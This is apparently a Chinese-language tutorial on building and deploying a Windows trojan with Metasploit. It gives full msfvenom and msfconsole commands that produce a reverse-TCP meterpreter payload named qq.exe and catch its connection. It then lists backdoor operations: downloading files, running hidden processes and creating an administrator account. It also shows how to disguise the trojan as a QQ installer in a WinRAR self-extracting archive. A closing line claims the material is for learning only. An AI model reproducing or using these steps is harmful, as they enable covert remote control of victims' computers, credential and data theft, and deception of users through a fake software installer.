文章目录

1.生成木马2.启动msfconsole3.后门操作3.1 文件（文件，目录等）操作3.2 网络命令（net等）操作3.3 系统命令（权限，用户，用户组等）操作3.4 压缩工具（zip/rar等等）伪装操作3.5 FTP服务

1.生成木马

使用msf模块中的msfvenom模块，生成.exe木马文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe

2.启动msfconsole

msfconsole

设置payload参数

//开启监听use exploit/multi/handler

//设置tcp监听set payload windows/meterpreter/reverse_tcp

//设置攻击主机IPset LHOST 攻击主机IP地址

//设置监听端口set lport 4444

//执行run

执行成功以后，建立Meterpreter会话。

3.后门操作

3.1 文件（文件，目录等）操作

获得工作目录；列出目录文件

查看文件内容

下载文件到主机

编辑文件

3.2 网络命令（net等）操作

获取目标主机上的网络接口信息

显示目标主机的路由信息

3.3 系统命令（权限，用户，用户组等）操作

获得目标主机上正在运行的进程

执行目标主机的文件（隐藏运行）

获取目标主机系统信息

创建用户，并提权为管理员权限

3.4 压缩工具（zip/rar等等）伪装操作

Winrar制作自解压文件QQ安装.exe(PS：生成木马后创建自解压文件)

3.5 FTP服务

ftp://目标主机IP地址

上传和下载文件

PS：仅供安全学习和教学用途，禁止非法使用。